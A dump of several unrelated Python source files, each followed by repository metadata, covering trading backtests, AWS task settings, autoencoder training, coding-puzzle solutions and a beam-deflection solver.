`optimizers.simulations._order.simulate_from_order_func`
`optimizers.simulations.statistics.score_results`
`optimizers.simulations.statistics.return_results`
`vbt.Portfolio`
"""
test_res = []
test_data = zip(close_test_sets, open_test_sets)
for close_prices, open_prices in test_data:
pf = simulate_lqe_model(
close_prices, open_prices,
period=period,
upper=upper,
lower=lower,
exit=exit,
delta=delta,
vt=vt,
burnin=burnin,
cash=cash,
commission=commission,
slippage=slippage,
order_size=order_size,
freq=freq,
hedge=hedge,
transformation=transformation,
)
test_res.append(pf)
# For some reason the pf object does not get collected normally
# As such we need to manual call `gc.collect` to prevent memory bloat
gc.collect()
wr = score_results(test_res)
total_return = return_results(test_res)
return wr, total_return
| jaythequant/VBToptimizers | optimizers/simulations/cv_orders.py | cv_orders.py | py | 5,840 | python | en | code | 2 | github-code | 36 |
11936036688 | from typing import Any, Optional, TYPE_CHECKING
import logging
from ..common.utils import deepmerge
from .execution_method import ExecutionMethod
from .aws_settings import INFRASTRUCTURE_TYPE_AWS, AwsSettings
if TYPE_CHECKING:
from ..models import (
Task,
TaskExecution
)
logger = logging.getLogger(__name__)
class AwsBaseExecutionMethod(ExecutionMethod):
def __init__(self, name: str,
task: Optional['Task'] = None,
task_execution: Optional['TaskExecution'] = None,
aws_settings: Optional[dict[str, Any]] = None) -> None:
super().__init__(name, task=task,
task_execution=task_execution)
if aws_settings is None:
self.aws_settings = self.merge_aws_settings(task=task,
task_execution=task_execution)
else:
self.aws_settings = AwsSettings.parse_obj(aws_settings)
@staticmethod
def merge_aws_settings(task: Optional['Task'],
task_execution: Optional['TaskExecution']) -> AwsSettings:
settings_to_merge: list[dict[str, Any]] = [ {} ]
if task:
if task.run_environment.aws_settings:
settings_to_merge.append(task.run_environment.aws_settings)
if task.infrastructure_settings and \
(task.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
settings_to_merge.append(task.infrastructure_settings)
if task_execution and task_execution.infrastructure_settings and \
(task_execution.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
settings_to_merge.append(task_execution.infrastructure_settings)
return AwsSettings.parse_obj(deepmerge(*settings_to_merge))
def compute_region(self) -> Optional[str]:
region = self.aws_settings.region
if (not region) and self.task:
infra = self.task.infrastructure_settings
if infra and (self.task.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
region = infra.get('region')
if (not region) and infra.get('network'):
region = infra['network'].get('region')
if not region:
run_environment = self.task.run_environment
re_aws_settings = run_environment.aws_settings
if re_aws_settings:
region = re_aws_settings.get('region')
if (not region) and re_aws_settings.get('network'):
region = re_aws_settings['network'].get('region')
return region
def enrich_task_settings(self) -> None:
if not self.task:
raise RuntimeError("enrich_task_settings(): No Task found")
aws_settings_dict = self.task.infrastructure_settings
if aws_settings_dict:
aws_settings = AwsSettings.parse_obj(aws_settings_dict)
aws_settings.update_derived_attrs(execution_method=self)
self.task.infrastructure_settings = deepmerge(
aws_settings_dict, aws_settings.dict())
# TODO: scheduling URLs
def enrich_task_execution_settings(self) -> None:
if not self.task_execution:
raise RuntimeError("enrich_task_execution_settings(): No Task Execution found")
aws_settings_dict = self.task_execution.infrastructure_settings
if aws_settings_dict:
aws_settings = AwsSettings.parse_obj(aws_settings_dict)
aws_settings.update_derived_attrs(execution_method=self)
self.task_execution.infrastructure_settings = deepmerge(
aws_settings_dict, aws_settings.dict())
| CloudReactor/task_manager | server/processes/execution_methods/aws_base_execution_method.py | aws_base_execution_method.py | py | 3,685 | python | en | code | 0 | github-code | 36 |
3219242168 | import sys
sys.path.append('../VQ-VAE')
from auto_encoder2 import VQ_CVAE
import argparse
from torch import optim
from torchvision import transforms
import fpa_dataset
parser = argparse.ArgumentParser(description='Train an autoencoder for hand depth image reconstruction')
parser.add_argument('-r', dest='dataset_root_folder', required=True, help='Root folder for dataset')
parser.add_argument('--split-filename', default='', help='Dataset split filename')
parser.add_argument('-e', dest='num_epochs', type=int, required=True,
help='Total number of epochs to train')
parser.add_argument('--use-cuda', dest='use_cuda', action='store_true', default=False,
help='Whether to use cuda for training')
parser.add_argument('-l', dest='epoch_log', type=int, default=10,
help='Total number of epochs to train')
parser.add_argument('--batch-size', type=int, default=1, help='Batch size')
args = parser.parse_args()
args.use_cuda = True
transform_depth = transforms.Compose([transforms.ToTensor()])
lr = 2e-4
d = 128
k = 256
num_channels_in = 1
num_channels_out = 1
model = VQ_CVAE(d=d, k=k, num_channels_in=num_channels_in, num_channels_out=num_channels_out)
if args.use_cuda:
model = model.cuda()
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = optim.lr_scheduler.StepLR(optimizer, 10, 0.5)
train_loader = fpa_dataset.DataLoaderTracking(root_folder=args.dataset_root_folder,
type='train', transform_color=None,
transform_depth=transform_depth,
batch_size=args.batch_size,
split_filename=args.split_filename,)
for epoch_idx in range(args.num_epochs - 1):
epoch = epoch_idx + 1
continue_batch_end_ix = -1
for batch_idx, (data, _) in enumerate(train_loader):
if batch_idx < continue_batch_end_ix:
print('Continuing... {}/{}'.format(batch_idx, continue_batch_end_ix))
continue
optimizer.zero_grad()
if args.use_cuda:
data = data.cuda()
outputs = model(data)
loss = model.loss_function(data, *outputs)
loss.backward()
optimizer.step()
a = 0 | pauloabelha/handy | train_autoencoder.py | train_autoencoder.py | py | 2,275 | python | en | code | 2 | github-code | 36 |
16627028163 | #!/bin/python3
import sys
def isBalanced(s):
if(len(s)) == 0:
return True
pairing = {"{": "}", "(":")", "[":"]"}
first = s[0]
try:
match = pairing[first]
except:
return False
openings = 0;
for i in range(1, len(s)):
if s[i] == first:
openings += 1
elif s[i] == match and openings == 0:
return isBalanced(s[1:i]) and isBalanced(s[i+1:])
elif s[i] == match:
openings -= 1
return False
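# Example of the recursive split (illustrative input): for "{[]}()", the '}' that
# closes the opening '{' is found at index 3, so the call reduces to
# isBalanced("[]") and isBalanced("()"), both balanced, giving YES overall.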
if __name__ == "__main__":
t = int(input().strip())
for a0 in range(t):
s = input().strip()
result = isBalanced(s)
if result:
print("YES")
else:
print("NO")
| mark-wiemer/hacker-rank | BalancedBrackets/balanced_brackets.py | balanced_brackets.py | py | 671 | python | en | code | 0 | github-code | 36 |
13988738028 | from typing import List
from bisect import bisect_left, bisect_right
class Solution:
def twoSumLessThanK(self, A: List[int], K: int) -> int:
A.sort()
i = bisect_left(A, K)
if i == 0 and A[i] == K:
return -1
elif i == len(A) or A[i] > K:
i -= 1
ans = -1
for j in range(i, -1, -1):
target = K - A[j] - 1
l = bisect_right(A, target, hi=j)
if l == j:
l = j - 1
elif (A[l] > target and l > 0):
l -= 1
if 0 <= l < j and A[l] + A[j] < K:
ans = max(ans, A[l] + A[j])
return ans
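# Quick sanity check with illustrative values (not taken from the original problem
# statement); the best pair strictly below K=60 in this list is 34 + 24 = 58.
if __name__ == "__main__":
    print(Solution().twoSumLessThanK([34, 23, 1, 24, 75, 33, 54, 8], 60))  # expected: 58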
| dariomx/topcoder-srm | leetcode/trd-pass/easy/two-sum-less-than-k/two-sum-less-than-k.py | two-sum-less-than-k.py | py | 593 | python | en | code | 0 | github-code | 36 |
40144939486 | from flask import request
from werkzeug.utils import secure_filename
from db import db
from models import Img
def upload_images(pic_list, private, user_id):
#import pdb; pdb.set_trace()
for pic in pic_list:
filename = secure_filename(pic.filename)
mimetype = pic.mimetype
if not filename or not mimetype or "image" not in str(mimetype):
return False
img = Img(img=pic.read(), user_id=user_id, private=private, name=filename, mimetype=mimetype)
db.session.add(img)
db.session.commit()
return True
| elmanreasat/imagipy | controllers/upload.py | upload.py | py | 573 | python | en | code | 0 | github-code | 36 |
26908641087 | import unittest
from models import UserTokens, UserDetails
class TokenTest(unittest.TestCase):
def test_user_token(self):
user='gbabun@gmail.com'
ud=UserDetails.gql('WHERE instapaper_account = :1' , user).get()
#self.assertTrue(ud is not None)
token=UserTokens()
#token.user_details=ud
token.put()
| bojanbabic/Instaright | backend/test/tokens_test.py | tokens_test.py | py | 312 | python | en | code | 1 | github-code | 36 |
33171162837 | import matplotlib.pyplot as plt
import cv2
import numpy as np
# from pyradar.classifiers.isodata import isodata_classification
from isodataclassifier import isodata_classification
def equalize_histogram(img, histogram, cfs):
"""
Equalize pixel values to [0:255].
"""
total_pixels = img.size
N, M = img.shape
min_value = img.min()
L = 256 # Number of levels of grey
cfs_min = cfs.min()
img_corrected = np.zeros_like(img)
corrected_values = np.zeros_like(histogram)
divisor = np.float32(total_pixels) - np.float32(cfs_min)
if not divisor: # this happens when the image has all the values equals
divisor = 1.0
factor = (np.float32(L) - 1.0) / divisor
corrected_values = ((np.float32(cfs) -
np.float32(cfs_min)) * factor).round()
img_copy = np.uint64(img - min_value)
img_corrected = corrected_values[img_copy]
return img_corrected
def equalization_using_histogram(img):
# Create histogram, bin edges and cumulative distributed function
max_value = img.max()
min_value = img.min()
assert min_value >= 0, \
"ERROR: equalization_using_histogram() img have negative values!"
start, stop, step = int(min_value), int(max_value + 2), 1
    histogram, bin_edge = np.histogram(img, range(start, stop, step))
cfs = histogram.cumsum() # cumulative frencuency table
img_corrected = equalize_histogram(img, histogram, cfs)
return img_corrected
params = {"K": 100, "I" : 1000, "P" : 10, "THETA_M" : 10, "THETA_S" : 0.01,"THETA_C" : 8, "THETA_O" : 0.02}
img = cv2.imread('dataset/original/before.jpg',0)
# kernel = np.ones((5,5),np.uint8)
plt.imshow(img)
plt.show()
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(1,1))
# print('Before')
img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel, iterations=7)
img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel, iterations=7)
# print('Operated Image')
#plt.imshow(img)
#plt.show()
# img = cv2.imread('dataset/after.jpg',0)
# # kernel = np.ones((5,5),np.uint8)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(1,1))
# print('After')
# img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel, iterations=7)
# img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel, iterations=7)
# print("After Operated Image")
# imgplot = plt.imshow(img)
# plt.show()
# run Isodata
class_image = isodata_classification(img, parameters=params)
# plt.imshow(class_image);
# plt.show()
# # equalize class image to 0:255
class_image_eq = equalization_using_histogram(class_image)
# # save it
cv2.imwrite('class_image_eq.jpg', class_image_eq.astype(np.uint8))  # save the equalized classification (output filename chosen here)
# print("Equalized image classified using histogram 1")
# imgplot = plt.imshow(class_image_eq)
# plt.show()
# # also save original image
# image_eq = equalization_using_histogram(image)
# # save it
# print("Equalized image classified using histogram 2")
# #imgplot = plt.imshow(image_eq)
# #plt.show()
| sauravkarn541/morphological_operators | isodata.py | isodata.py | py | 2,932 | python | en | code | 0 | github-code | 36 |
34023408707 | import cv2
import os
from ultralytics import YOLO
from datetime import datetime, timedelta
# Load the YOLOv8 model
modelo_pt = r'Modelos\Deploys_Ultralytics_Hub\detector_de_placas_yolov8_nano.pt'
model = YOLO(f'{modelo_pt}')
# Open the video file
video_path = r"Video\Video_teste.mp4"
cap = cv2.VideoCapture(video_path)
# Make sure the output directory exists; create it if it does not
save_path_cortadas = r"Resultado_de_dados\imagens_cortadas"
if not os.path.exists(save_path_cortadas):
os.makedirs(save_path_cortadas)
save_path_inteiras = r"Resultado_de_dados\imagens_inteiras"
if not os.path.exists(save_path_inteiras):
os.makedirs(save_path_inteiras)
# Manually set the recording start time (VERY IMPORTANT: adjust this for each video!)
start_time = datetime(2023, 10, 30, 17, 35, 9)
# Loop through the video frames
file_num = 0
unique_id = set()
# Set the desired new width and height
new_width, new_height = 1100, 600
while cap.isOpened():
# Read a frame from the video
success, frame = cap.read()
if success:
        # Resize the frame to the working resolution (new_width x new_height)
frame = cv2.resize(frame, (new_width, new_height))
# Run YOLOv8 inference on the frame
results = model.track(frame, persist=True, conf=0.95, save_txt=True)
#results = model.predict(frame, conf=0.95, save_txt=True)
if results[0].boxes.id is not None:
boxes = results[0].boxes.xyxy.cpu().numpy().astype(int)
ids = results[0].boxes.id.cpu().numpy().astype(int)
for box, id in zip(boxes, ids):
int_id = int(id)
if int_id not in unique_id:
unique_id.add(int_id)
box = box[:4]
# Crop the image using the bounding box coordinates
cropped_img = frame[box[1]:box[3], box[0]:box[2]]
class_id = int(id)
                    # Compute the detection time by adding the seconds elapsed in the video to the start time
seconds_elapsed = cap.get(cv2.CAP_PROP_POS_FRAMES) / cap.get(cv2.CAP_PROP_FPS)
detection_time = start_time + timedelta(seconds=seconds_elapsed)
                    # Save the cropped image named with the relative timestamp
filename = f"imagem_destacada_do_id_{int_id}_horario_{detection_time.strftime('%H-%M-%S')}.jpg"
filepath = os.path.join(save_path_cortadas, filename)
cv2.imwrite(filepath, cropped_img)
filename_inteira = f"foto_inteira_do_id_{int_id}_horario_{detection_time.strftime('%H-%M-%S')}.jpg"
filepath_inteira = os.path.join(save_path_inteiras, filename_inteira)
cv2.imwrite(filepath_inteira, frame)
frame = results[0].plot()
# Display the annotated frame
cv2.imshow(f"Detectando pelo modelo: {modelo_pt}", frame)
# Break the loop if 'q' is pressed
if cv2.waitKey(1) & 0xFF == ord("q"):
break
else:
# Break the loop if the end of the video is reached
break
# Release the video capture object and close the display window
cap.release()
cv2.destroyAllWindows() | DevJoaoPedroGiancoli/BrazilTrafficSignsDetector | Detector/detector_com_ids.py | detector_com_ids.py | py | 3,255 | python | pt | code | 0 | github-code | 36 |
1655512886 | import random
from turtle import Screen
from display import DisplaySet
from paddle import Paddle
from ball import Ball
from score import Score
import time
screen = Screen()
screen.title('PONG')
screen.bgcolor('black')
screen.setup(height=600, width=800)
screen.tracer(0)
set_game_field = DisplaySet()
game_on = True
ball = Ball()
score = Score()
score_p1 = Score()
score_p2 = Score()
paddle_1 = Paddle()
paddle_2 = Paddle()
paddle_1.paddle_position(-350)
score_p1.score_position(-120)
paddle_2.paddle_position(350)
score_p2.score_position(100)
screen.listen()
screen.onkey(paddle_1.paddle_up, 'q')
screen.onkey(paddle_1.paddle_down, 'a')
screen.onkey(paddle_2.paddle_up, 'Up')
screen.onkey(paddle_2.paddle_down, 'Down')
while game_on:
time.sleep(ball.ball_speed)
screen.update()
ball.ball_on_the_run()
tilt_angle = random.randrange(4, 8)
if ball.ycor() > 280 or ball.ycor() < -280:
new_angle = 360 - ball.heading()
ball.setheading(new_angle)
elif ball.distance(paddle_1) < 50 and ball.xcor() < -330:
new_angle = 360 - (ball.heading() * 2 - tilt_angle)
ball.setheading(new_angle)
elif ball.distance(paddle_2) < 50 and ball.xcor() > 330:
new_angle = 180 - (ball.heading() * 2 + tilt_angle)
ball.setheading(new_angle)
elif ball.xcor() > 370:
ball.p1_score_set()
score_p1.score_count()
elif ball.xcor() < -370:
ball.p2_score_set()
score_p2.score_count()
if score_p1.score == 10 or score_p2.score == 10:
score.end_game()
game_on = False
screen.exitonclick()
| wojtekgajda/pong_game | main.py | main.py | py | 1,600 | python | en | code | 0 | github-code | 36 |
29295752629 | def multiply(*numbers):  # the asterisk packs the arguments into a tuple; tuples are iterable
total = 1
for number in numbers:
total *= number
return total
print("start")
print(multiply(2, 3, 5, 6))
print("Finish")
# Debug Hot Keys
# fn+5 -> start
# fn+10 -> step over
# fn+11 -> step in
# fn+shift+11 -> step out
| hvaleri0/Python-Programming-for-developers | debugging.py | debugging.py | py | 324 | python | en | code | 0 | github-code | 36 |
41771854107 | from random import randint, choice
class Karma:
def __init__(self):
self.__karma_points = 0
self.__days_count = 0
def one_day(self, value):
self.set_day()
try:
if value == 10:
                excepts_tuple = ('KillError', 'DrunkError', 'CarCrashError', 'GluttonyError', 'DepressionError')
                raise Exception(choice(excepts_tuple))
else:
point = randint(1, 7)
self.set_karma_point(point)
except Exception as exc:
with open('karma.log', 'a', encoding='UTF-8') as file:
                file.writelines(f'\nDay {self.get_day()}, error: {exc}')
def set_karma_point(self, point):
self.__karma_points += point
def get_karma(self):
return self.__karma_points
def get_day(self):
return self.__days_count
def set_day(self):
self.__days_count += 1
def toconstant(self):
while True:
finish = self.get_karma()
if finish >= 500:
                print(f'Day {self.get_day()}, {finish} karma points earned.')
break
else:
value = randint(1, 10)
self.one_day(value)
gokarma = Karma()
gokarma.toconstant()
| Bednyakov/Tasks | OOP (ООП)/08_karma/main.py | main.py | py | 1,300 | python | en | code | 0 | github-code | 36 |
19839708610 | numero = 1237543
contador = 0
# runs a block of code
# as long as the condition holds
# a while loop can also take an optional else clause
# which runs when the while loop finishes
while numero >= 1:
#contador = contador + 1
contador += 1
numero = numero / 10
else:
print(contador)
| javieralarcon77/curso-python | 6. Condiciones - Ciclos/while.py | while.py | py | 307 | python | es | code | 0 | github-code | 36 |
21119814957 | from typing import List
class Solution:
def vowelStrings(self, words: List[str], left: int, right: int) -> int:
        vowels = {'a', 'e', 'i', 'o', 'u'}
        ans = 0
        for i, word in enumerate(words):
            if left <= i <= right and word[0] in vowels and word[-1] in vowels:
                ans += 1
        return ans
if __name__ == '__main__':
words = ["are","amy","u"]
left = 0
right = 2
words = ["hey","aeo","mu","ooo","artro"]
left = 1
right = 4
rtn = Solution().vowelStrings(words, left, right)
print(rtn) | plattanus/leetcodeDAY | python/6315. 统计范围内的元音字符串数.py | 6315. 统计范围内的元音字符串数.py | py | 648 | python | en | code | 0 | github-code | 36 |
43205799120 |
import pandas as pd
import numpy as np
import sqlite3
from datetime import timedelta
import matplotlib.pyplot as plt
from IPython.display import display
from copy import deepcopy
from ipywidgets import IntProgress
import warnings
warnings.filterwarnings(action='ignore', category=FutureWarning) # setting ignore as a parameter and further adding category
def percentile(n):
'''Calculate n - percentile of data'''
def percentile_(x):
return np.percentile(x, n)
percentile_.__name__ = 'pctl%s' % n
return percentile_
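# Example (hypothetical frame/columns): df.groupby('store')['sales'].agg([percentile(10)])
# yields a result column labelled 'pctl10'; setting __name__ above is what gives the
# aggregate that readable label in pandas output.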
def fill_missing_dates(x, date_col):
min_date, max_date = x[date_col].min(), x[date_col].max()
groupby_day = x.groupby(pd.PeriodIndex(x[date_col], freq='D'))
results = groupby_day.sum(min_count=1).sort_values(by=date_col)
    return results  # NOTE: returning here means the reindex/fill below never runs
idx = pd.period_range(min_date, max_date)
results = results.reindex(idx, fill_value=np.nan)
results.index.rename(date_col, inplace=True)
return results
def calc_preag_fill(data, group_col, date_col, target_cols, preagg_method):
## calc preaggregation
data_preag = data.groupby(group_col).agg(
preagg_method)[target_cols].reset_index().sort_values(by=date_col)
## fill missing dates
data_preag_filled = data_preag.groupby(group_col[:-1]).apply(
fill_missing_dates, date_col=date_col).drop(group_col[:-1],
axis=1).reset_index()
## return DataFrame with calculated preaggregation and filled missing dates
return data_preag_filled
def calc_ewm(data_preag_filled, group_col, date_col, span):
## calc ewm stats
    lf_df_filled = (
        data_preag_filled.groupby(group_col[:-1])
        .apply(lambda x: x.set_index(date_col).ewm(span=span).mean())
        .drop(group_col[:-1], axis=1)
    )
## return DataFrame with rolled columns from target_vars
return lf_df_filled
def shift(lf_df_filled, group_col, date_col, lag):
lf_df = lf_df_filled.groupby(
level=group_col[:-1]).apply(lambda x: x.shift(lag)).reset_index()
lf_df[date_col] = pd.to_datetime(lf_df[date_col].astype(str))
## return DataFrame with following columns: filter_col, id_cols, date_col and shifted stats
return lf_df
def calc_rolling(data_preag_filled, group_col, date_col, method, w):
## calc rolling stats
    lf_df_filled = (
        data_preag_filled.groupby(group_col[:-1])
        .apply(lambda x: x.set_index(date_col).rolling(window=w, min_periods=1).agg(method))
        .drop(group_col[:-1], axis=1)
    )
## return DataFrame with rolled columns from target_vars
return lf_df_filled
def day_features(result2):
result2["weekday"] = result2.period_dt.dt.weekday
result2["monthday"] = result2.period_dt.dt.day
result2['is_weekend'] = result2.weekday.isin([5,6])*1
return result2
def generate_lagged_features(
data: pd.DataFrame,
target_cols: list = ['Demand'],
id_cols: list = ['SKU_id', 'Store_id'],
date_col: str = 'Date',
lags: list = [7, 14, 21, 28],
windows: list = ['7D', '14D', '28D', '56D'],
preagg_methods: list = ['mean'],
agg_methods: list = ['mean', 'median', percentile(10), pd.Series.skew],
dynamic_filters: list = ['weekday', 'Promo'],
ewm_params: dict = {'weekday': [14, 28], 'Promo': [14, 42]}) -> pd.DataFrame:
'''
data - dataframe with default index
target_cols - column names for lags calculation
id_cols - key columns to identify unique values
date_col - column with datetime format values
lags - lag values(days)
windows - windows(days/weeks/months/etc.),
calculation is performed within time range length of window
preagg_methods - applied methods before rolling to make
every value unique for given id_cols
agg_methods - method of aggregation('mean', 'median', percentile, etc.)
dynamic_filters - column names to use as filter
ewm_params - span values(days) for each dynamic_filter
'''
data = data.sort_values(date_col)
out_df = deepcopy(data)
dates = [min(data[date_col]), max(data[date_col])]
total = len(target_cols) * len(lags) * len(windows) * len(preagg_methods) * len(agg_methods) * len(dynamic_filters)
progress = IntProgress(min=0, max=total)
display(progress)
for filter_col in dynamic_filters:
group_col = [filter_col] + id_cols + [date_col]
for lag in lags:
for preagg in preagg_methods:
data_preag_filled = calc_preag_fill(data, group_col, date_col,
target_cols, preagg)
## add ewm features
for alpha in ewm_params.get(filter_col, []):
#print("%s %s %s %s" % (filter_col, lag, preagg, alpha))
ewm_filled = calc_ewm(data_preag_filled, group_col,
date_col, alpha)
ewm = shift(ewm_filled, group_col, date_col, lag)
                    new_names = {x: "{0}_lag{1}d_alpha{2}_{3}".format(x, lag, alpha, filter_col) for x in target_cols}
out_df = pd.merge(out_df,
ewm.rename(columns=new_names),
how='outer',
on=group_col)
## add rolling features
for w in windows:
for method in agg_methods:
rolling_filled = calc_rolling(data_preag_filled,
group_col, date_col,
method, w)
## lf_df - DataFrame with following columns: filter_col, id_cols, date_col, shifted rolling stats
rolling = shift(rolling_filled, group_col, date_col,
lag)
method_name = method.__name__ if type(
method) != str else method
                        new_names = {x: "{0}_lag{1}d_w{2}_{3}".format(x, lag, w, filter_col) for x in target_cols}
out_df = pd.merge(out_df,
rolling.rename(columns=new_names),
how='outer',
on=group_col)
progress.value += 1
return out_df
def preABT_modification(data : pd.DataFrame) -> (pd.DataFrame):
target_cols = ['TGT_QTY']
id_cols = ['PRODUCT_ID', 'LOCATION_ID']
date_col = 'PERIOD_DT'
built_in_funcs = [pd.Series.kurtosis, pd.Series.skew]
# flts = {'Promo': {'oprm':'>0', 'npromo':'==0', 'aprm':'>-1'}, 'weekday' : {'md':'==0', 'tue':'==1', 'wd':'==2', 'th':'==3', 'fr':'==4', 'sa':'==5', 'su':'==6', 'anyday':'>-1'}}
data['NoFilter'] = 1
data_lagged_features = generate_lagged_features(data
, target_cols = target_cols
, id_cols = id_cols
, date_col = date_col
, lags = [22, 28, 35]
, windows = ['14D', '21D', '28D', '56D']
, preagg_methods = ['sum'] # ['mean', 'count']
, agg_methods = ['mean'] #, percentile(10), percentile(90)]
, dynamic_filters = ['PROMO_FLG', 'NoFilter']
, ewm_params={'NoFilter': [14, 28], 'PROMO_FLG': [14, 28]}
)
return data_lagged_features
| MaksimSavinov/demand_forecasting_pipeline | Pipeline/preABT.py | preABT.py | py | 7,729 | python | en | code | 0 | github-code | 36 |
2123056410 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 7 20:18:11 2018
@author: tanthanhnhanphan
MECH2700: Assignment 2
"""
import matplotlib.pyplot as plt
from numpy import *
from math import *
D = 100*10**3 #Dynamic Pressure
Ly = 1 #m
Lx = 5 #m
a = 20*pi/180
E = 70*10**9 #Young's Modulus
S = 96.5#Fatigue strength Mpa
Izz = 5*10**-5 #m4
ymax = 0.05 #m
FOS = 1.2
def q(i, n):
load = D*Ly*sin(a)*(1-(i*Lx/n)**2/Lx**2)
return load
"""
def x(n):
for i in range(n+1):
xx = i*Lx/n
print(xx)
print(x(7))
"""
"""
A = array([[7, -4, 1, 0, 0, 0, 0],
[-4, 6, -4, 1, 0, 0, 0],
[1, -4, 6, -4, 1, 0, 0],
[0, 1, -4, 6, -4, 1, 0],
[0, 0, 1, -4, 6, -4, 1],
[0, 0, 0, 1, -4, 5, -2],
[0, 0, 0, 0, 2, -4, 2]], float)
"""
#trial
"""
def s(n):
space = Lx/n
return space
h = s(7)
"""
#c = array([[q(1,7), q(2,7), q(3,7), q(4,7), q(5,7), q(6,7), q(7,7)]])*h**4/(E*Izz)
#b
#print(linspace(0,5,7))
def rhs(n):
h= Lx/n
q_1 = D*Ly*sin(a)*(1-(Lx/n)**2/Lx**2)*h**4/(E*Izz)
load = array([[q_1]])
#print(D*Ly*sin(a)*(1-(Lx/n)**2/Lx**2))
for i in range(2, n+1):
q_i = D*Ly*sin(a)*(1-(i*Lx/n)**2/Lx**2)*h**4/(E*Izz)
#print(D*Ly*sin(a)*(1-(i*Lx/n)**2/Lx**2))
#print(i*Lx/n)
load = vstack((load, [[q_i]]))
return load
"""
def rhs_1(n):
h = Lx/n
x = linspace(1,5,n)
q_1 = D*Ly*sin(a)*(1-(x[1]**2/Lx**2)*h**4/(E*Izz))
load = array([[q_1]])
print(load)
print(x)
#for i in range(n+1):
q_i = D*Ly*sin(a)*(1-x**2/Lx**2)*h**4/(E*Izz)
print(q_i)
#load = vstack((load, [[q_i]]))
#load = vstack((load, q_i))
return load
"""
#print("RHS",rhs(7))
#b = c.transpose()
def deflection(n):
w = zeros((n,n))
w[0,0] = 7
w[n-2, n-2] = 5
w[n-2, n-1] = -2
w[n-1, n-3] = 2
w[n-1, n-1] = 2
for k in range(0,n-1):
w[k+1, k] = -4
for k in range(0, n-3):
w[k+1,k+1] = 6
for k in range(0, n-2):
w[k, k+2] = 1
for k in range(0, n-3):
w[k+2,k] = 1
for k in range(0, n-2):
w[k, k+1] = -4
return w
#print(deflection((7)))
#print("~~~~")
#print(b)
#Direct Solver Gauss-Jordan Elimination
def solve(A,b, testmode = True):
"""
Input:
A: nxn matrix of coefficients
b: nx1 matrix of rhs values
Output:
x: solutions of Ax=b
"""
nrows, ncols = A.shape
c = hstack([A,b])
#print(c)
for j in range(0, nrows):
p = j
for i in range(j+1, nrows):
#Select pivot
if abs(c[i,j]) > abs(c[p,j]): p = i
#Swap the rows
c[p,:], c[j,:] = c[j,:].copy(), c[p,:].copy()
#Elimination
c[j,:] = c[j,:]/c[j,j]
for i in range(0,nrows):
if i!=j:
c[i,:] = c[i,:] - c[i,j]*c[j,:]
I, x = c[:,nrows], c[:,-1]
return x
Alist = []
Blist = []
Clist = []
Dlist = []
Elist = []
rhslist = []
def solve_optimise(A,b):
nrows, ncols = A.shape
c = hstack([A,b])
print(b)
#b.tolist()
#print(b)
#print(c)
for i in range(n-2):
Alist.append(A[i, i+2])
for i in range(n-1):
Blist.append(A[i, i+1])
for i in range(n):
Clist.append(A[i,i])
for i in range(n-1):
Dlist.append(A[i+1, i])
for i in range(n-2):
Elist.append(A[i+2, i])
for i in range(n):
rhslist.append(b[i,0])
rhslistcopy = rhslist.copy()
"""
alpha = []
mu = []
gamma = []
beta = []
z = []
mu_1 = Clist[0]
alpha_1 = Blist[0]/mu_1
beta_1 = Alist[0]/mu_1
z_1 = rhslist[0]/mu_1
gamma_2 = Dlist[0]
mu_2 = Clist[1] - alpha_1*gamma_2
alpha_2 = (Blist[1]-beta_1*gamma_2)/mu_2
beta_2 = Alist[1]/mu_2
z_2 = (rhslist[1]-z_1*gamma_2)/mu_2
alpha_minus2 = alpha_1
alpha.append(alpha_1)
alpha.append(alpha_2)
mu.append(mu_1)
mu.append(mu_2)
gamma.append(gamma_2)
beta.append(beta_1)
z.append(z_1)
z.append(z_2)
print(gamma)
for i in range(3, n-3):
gamma_i = Dlist[i-2] - alpha[i-3]*Elist[i-3]
mu_i = Clist[i-2] - beta[i-3]*Elist[i-3] - alpha[i-2]*gamma[i-2]
beta_i = Alist[i-2]/mu_i
gamma.append(gamma_i)
beta.append(beta_i)
z_i = (rhslist[i-1]-z[i-3])
"""
print(Alist)
print(Blist)
print(Clist)
print(Dlist)
print(Elist)
print(rhslist)
for i in range(n-1):
multiplier_1 = Dlist[i]/Clist[i]
#print('multi ',multiplier_1)
#print(multiplier_1)
#Dlist[i] = Dlist[i] - multiplier_1*Clist[i]
#print('before ', rhslist[i+1])
#rhslist[i+1] = rhslistcopy[i+1] - multiplier_1*rhslistcopy[i]
#print('after', rhslist[i+1])
#print(rhslist)
#print(rhslistcopy)
#print('~~~')
for i in range(n-2):
multiplier_2 = Elist[i]/Clist[i]
#print('multi ', multiplier_2)
#print(multiplier_2)
Elist[i] = Elist[i] - multiplier_2*Clist[i]
#print('Before ',rhslist[i+2])
#rhslist[i+2] = rhslist[i+2] - multiplier_2*rhslistcopy[i]
#print('After ', rhslist[i+2])
print(Dlist)
print(Elist)
#print(rhslist)
#print(Clist[n-1])
#x_n = rhslist[n-1]/Clist[n-1]
#print(x_n)
#for i in reversed(range(n)):
#print(i)
#for i in range(n-1):
#print(multiplier_1)
#print(Alist)
return
# solve_optimise(deflection(n), rhs(n))  # experimental solver; n is not defined at this point in the script
#print(A)
#print(c)
#print(x)
#print(solve(deflection(280),rhs(280)))
for i in [7,14,28,280]:
A = deflection(i)
b = rhs(i)
x = solve(A,b)
xx= append(0, x)
position = []
for j in range(0,i+1):
position.append(j*Lx/i)
#print(position)
plt.plot(position, xx, label=i)
plt.xlabel('x(m)')
plt.ylabel('Deflection (m)')
plt.legend()
plt.show()
space = []
free_end_deflection = []
node = []
n = 280
#print(deflection(n))
#print(rhs(n))
sol = solve(deflection(n),rhs(n))
#print(sol)
sol_free_end = sol[[n-1]]
#print("Solution",sol_free_end)
for i in range(7, 50):
A = deflection(i)
b = rhs(i)
x = solve(A,b)
xx = x[[i-1]]
free_end_deflection.append(xx)
node.append(i)
h = Lx/i
space.append(h)
if abs(xx - sol_free_end) < 0.1/100*sol_free_end:
print(i)
break
#print(xx)
#print(h)
#print(space)
plt.plot(space, free_end_deflection)
plt.show()
